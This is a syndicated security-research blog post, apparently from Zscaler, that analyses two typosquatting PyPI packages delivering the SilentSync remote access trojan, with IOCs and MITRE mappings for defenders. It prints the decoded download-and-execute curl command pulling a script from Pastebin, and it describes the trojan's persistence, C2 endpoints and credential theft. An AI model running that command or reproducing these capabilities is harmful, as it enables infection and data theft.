IntroductionZscaler ThreatLabz regularly monitors for threats in the popular Python Package Index (PyPI), which contains open source libraries that are frequently used by many Python developers. In July 2025, a malicious Python package named termncolor was identified by ThreatLabz. Just a few weeks later, on August 4, 2025, ThreatLabz uncovered two more malicious Python packages named sisaws and secmeasure. The former Python package leverages typosquatting for the legitimate sisa package, which integrates with the public APIs for Sistema Integrado de Información Sanitaria Argentino (SISA), which is Argentina’s national health information system. Interestingly, ThreatLabz discovered another malicious package named secmeasure, which was created by the same author. Both Python packages deliver a Remote Access Trojan (RAT) that ThreatLabz dubbed SilentSync, which is retrieved from Pastebin. SilentSync’s capabilities include remote command execution, file exfiltration, screen capturing, and web browser data theft.Key TakeawaysOn August 4, 2025, ThreatLabz uncovered two malicious Python packages named sisaws and secmeasure that deliver SilentSync, a Python-based RAT, that were created by the same author.SilentSync is capable of remote command execution, file exfiltration, and screen capturing.SilentSync also extracts web browser data, including credentials, history, autofill data, and cookies from web browsers like Chrome, Brave, Edge, and Firefox.The malicious Python packages currently only infect Windows systems.SilentSync communicates with a command-and-control (C2) server using HTTP, with periodic beaconing and task polling.Technical AnalysisIn the following section, we examine how the sisaws and secmeasure PyPI packages deliver SilentSync RAT. The figure below illustrates the attack sequence for both of these Python packages after they are installed from PyPI and the malicious functions are invoked.Figure 1: Attack chain for two malicious Python packages discovered by ThreatLabz in the PyPI repository.Similarities between the sisaws and sisa packagesThe sisaws package imitates the behavior of the legitimate Python package sisa, which includes the modules puco and renaper that act as wrappers around public government APIs for healthcare information. These modules enable applications to request the user’s National Identity Document (DNI) number, call the corresponding SISA web service, and return structured responses. For example, the puco module can be used to verify a citizen’s health coverage in the Unified Registry of Health Coverage (PUCO) database. The module provides functions to validate the DNI, query the puco endpoint, parse the XML response, and return the result as a Python dictionary. Similarly, the renaper module performs lookups against the National Registry of Persons (RENAPER) database. The output includes name, surname, date of birth, and social security coverage.The sisaws package superficially mimics the behavior of the legitimate modules (puco and renaper). The sisaws package validates inputs just like the real package. For example, DNIs must be numeric and eight digits long, the tokens must be correct, and responses are wrapped in dictionaries. Even the success path imitates the real API’s responses by returning structured user data, expiration timestamps, and access roles. At a very quick glance, the sisaws package appears to be a legitimate Python library to interface with Argentina’s healthcare services.However, the similarities are only surface-level. The sisaws package contains a function named gen_token in the initialization script (__init__.py) that acts as a backdoor malware downloader. This function contains a hardcoded token value (f5d3a8c2-4c01-47e2-a1a4-4dcb9a3d7e65) that must be provided as input. Any other input results in an error response. If the correct token is provided, the function returns a forged API-like response. This response contains structured data that mimics SISA services, including a user profile with a msal.gov.ar email address, assigned roles, and a token expiration timestamp. Additionally, a secondary static token (VAS7VSD89BDS86AFHASDBA9SD1) is issued for subsequent operations. A fake API response example is shown below: {
“status”: “success”,
“message”: “Token válido”,
“user”: {
“id”: 842,
“username”: “Jorge [removed]”,
“email”: “[removed]@msal.gov.ar”,
“roles”: [“user”, “api_access”, “webservices”],
“token_expires”: “2025-09-09T11:45:32.123456Z”
},
“token”: “VAS7VSD89BDS86AFHASDBA9SD1”
}The sisaws package’s search() function enforces the use of the secondary token. When the token is present, the function sends an HTTP GET request to a hardcoded endpoint, as shown in the example below:http://200.58.107[.]25:2104/datalist?dni=&password=perroThe query sends the DNI value provided along with a static password. The response from the external server is processed in an unusual way. Instead of being parsed through a standard format such as JSON, the data is passed into Python’s ast.literal_eval() function after trimming the first four characters. This means the script expects the remote server to return Python literal structures, which are then evaluated directly in memory. Not only is this an unconventional parsing method, it also tightly couples the package’s functionality to the threat actor’s server-side output format.If a developer imports the sisaws package and invokes the gen_token function, the code will decode a hexadecimal string that reveals a curl command, which is then used to fetch an additional Python script, as shown below.curl -sL https://pastebin.com/raw/jaH2uRE1 -o %TEMP%\\helper.py && python %TEMP%\\helper.pyThe Python script retrieved from PasteBin is written to the filename helper.py in a temporary directory and executed. Note that the Python package currently only targets Windows systems, although SilentSync has built-in features for Linux and macOS as well.Similarities between the sisaws and secmeasure packagesThreatLabz identified another Python package in PyPI named secmeasure that was uploaded by the same author ([email protected]) as the sisaws package. While secmeasure’s description claims the package is a “library for cleaning strings and applying security measures”, in reality, secmeasure behaves similarly to sisaws. The secmeasure package includes various string manipulation functions, but the primary purpose is to deploy malware. The following is an overview of the legitimate functions supported by secmeasure:strip_whitespace(s): Removes extra whitespace.remove_special_chars(s): Removes non-alphanumeric/whitespace characters.escape_html(s): Escapes HTML special characters.normalize_unicode(s): Converts Unicode to ASCII equivalents.sanitize_command(s): Sanitizes input for shell commands.hex_a_str(hex_string): Decodes hex into strings.However, the secmeasure package will raise NameError exceptions for the re, html, and unicodedata modules not being imported properly.Similar to sisaws, the secmeasure initialization script contains a malicious function named sanitize_input, that when invoked, will execute the same hex-encoded curl command used by the sisaws package to distribute SilentSync RAT.The author for sisaws and secmeasure was quite active at the beginning of August, with four releases in two days as shown in the table below.Package NameVersionUploaded Datesecmeasure0.1.003, Aug 2025secmeasure0.1.103, Aug 2025secmeasure0.1.204, Aug 2025sisaws2.1.604, Aug 2025Table 1: Version information for the sisaws and secmeasure packages.The existence of multiple versions and packages suggests the threat actor may have been experimenting with various methods and lures. In addition to behavioral similarities, the metadata of the secmeasure and sisaws packages overlap including the email address and even the package name, as shown in the figure below.Figure 2: A comparison of the secmeasure and sisaws package metadata.SilentSync RATThe malicious script downloaded by sisaws and secmeasure is SilentSync, a Python-based RAT with remote access and data collection capabilities.Persistence across different operating systemsSilentSync achieves persistence by using platform-specific techniques to ensure it runs automatically after system reboots or user logins. (Note that the malicious Python packages themselves currently only infect Windows systems.)On Windows, SilentSync creates a registry entry under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key with the name PyHelper to launch the script.On Linux, SilentSync modifies the crontab with an @reboot directive to execute the payload at startup.For macOS, SilentSync generates a com.apple.pyhelper.plist file in the ~/Library/LaunchAgents directory to register itself as a launch agent.C2 communicationSilentSync communicates with its C2 server over HTTP to a hardcoded server whose IP address (200.58.107[.]25) is stored in Base64 and decoded at runtime. The network protocol implements a REST API using TCP port 5000. The REST endpoints in the table below are used to perform key functions.EndpointFunction/checkinBeacon to verify connectivity/comandoRequest commands to execute/respuestaSend a status message/archivoSend command output / stolen dataTable 2: REST API endpoints used by SilentSync to perform key actions.Remote operation and exfiltrationSilentSync is capable of harvesting browser data, executing shell commands, capturing screenshots, and stealing files. File exfiltration can be performed for entire directories (and compressed into ZIP archives) or for individual files. After exfiltration, all artifacts are deleted from the infected system to avoid detection.SilentSync supports the commands in the table below:CommandDescriptioncmdExecute a shell command and return the output.getExfiltrate files or a directory. If the specified argument ends with the characters /*, the RAT interprets the value as a directory, compresses the contents into a ZIP archive, and uploads the result.screenshotCapture a screenshot of the victim’s desktop.uploadNotify the server that a file upload is pending.browserdataSteal browser data (currently Windows only).Table 3: Commands supported by SilentSync.Note that the browserdata command is currently supported on Windows only. When invoked, the client enumerates local profiles for Chromium-family browsers (Chrome, Edge, Brave) and Firefox, harvesting four categories per profile: history, autofill, cookies, and saved credentials.
ConclusionThe discovery of the malicious PyPI packages sisaws and secmeasure highlight the growing risk of supply chain attacks within public software repositories. By leveraging typosquatting and impersonating legitimate packages, threat actors can gain access to personally identifiable information (PII). Our analysis highlights the importance of scrutinizing all software packages, even those sourced from trusted repositories, to detect and prevent hidden threats.Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to this threat at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for this threat.Figure 3: Zscaler Cloud Sandbox report for SilentSync RAT.In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to this threat at various levels with the following threat name:Python.RAT.SilentSyncIndicators Of Compromise (IOCs)MD5Name327233d73236ca4d7c18ffd8f9924127Sisaws PyPI package9a092bbfc5325cbfca2f9807d074616aSecmeasure PyPI package3918cace55342909c8309ec37d0207fdSilentSync RAThttps://pastebin[.]com/raw/jaH2uRE1Downloading URLl200.58.107[.]25C2 server MITRE ATT&CK TechniquesTacticIDTechnique NameDescriptionPersistenceT1547Boot or Logon Autostart ScriptsEnables persistence by executing scripts during boot or logon activities.Credential AccessT1555Credentials from Password StoresAllows attackers to extract credentials stored in software for later misuse.Command and ControlT1071Application Layer ProtocolCommunicates with the C2 server using application-level protocols (e.g., HTTP/HTTPS).Defense EvasionT1140Deobfuscate/Decode Files or InformationDecodes or deobfuscates malicious payloads to evade detection during runtime.DiscoveryT1082System Information DiscoveryCollects information about the victim’s system to tailor further actions.

*** This is a Security Bloggers Network syndicated blog from Security Research | Blog authored by Manisha Ramcharan Prajapati (Sr. Security Researcher). Read the original post at: https://www.zscaler.com/blogs/security-research/malicious-pypi-packages-deliver-silentsync-rat